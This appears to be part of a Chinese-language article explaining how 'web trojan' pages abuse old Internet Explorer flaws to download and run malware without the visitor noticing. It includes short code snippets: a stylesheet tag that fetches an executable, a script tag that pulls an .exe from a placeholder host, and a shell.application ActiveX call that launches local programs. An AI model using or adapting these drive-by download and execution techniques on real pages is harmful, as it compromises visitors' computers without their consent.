国内资深黑客详谈网页木马(2)

网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。
打开一个网页，IE浏览器不会自动下载程序和运行程序，这是因为，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面列举一些IE浏览器等存在的漏洞来分别说明为什么利用网页木马可以下载程序和运行程序。

1.下载可执行文件.

index里有一个代码漏洞< LINK href="ray.exe" rel=stylesheet type=text/css >，IE会把可执行文件误认为CSS样式表而下载到IE的临时文件目录.

也可以利用< SCRIPT LANGUAGE="icyfoxlovelace" src="< A href='http://test.net/1.exe">< /SCRIPT'>http://test.net/1.exe">< /SCRIPT>这段代码，把这段代码插入到网页源代码的…之间,运行后就会发现在IE的临时目录Temporary Internet Files下，已经下载了1.exe这个病毒文件。

2.自动运行程序

< SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); < /SCRIPT>

把这段代码插入到网页源代码的…之间，然后用IE打开该网页，这段代码可以在IE中自动打开记事本。

这段代码使用了shell.application控件，该控件能使网页获得执行权限，替换代码中的“Notepad.exe”（记事本）程序，就可以用它自动运行本地电脑上的任意程序。

通过以上的例子可以看出，利用IE的漏洞，在网页中插入相关的代码，IE完全可以自动下载和运行程序。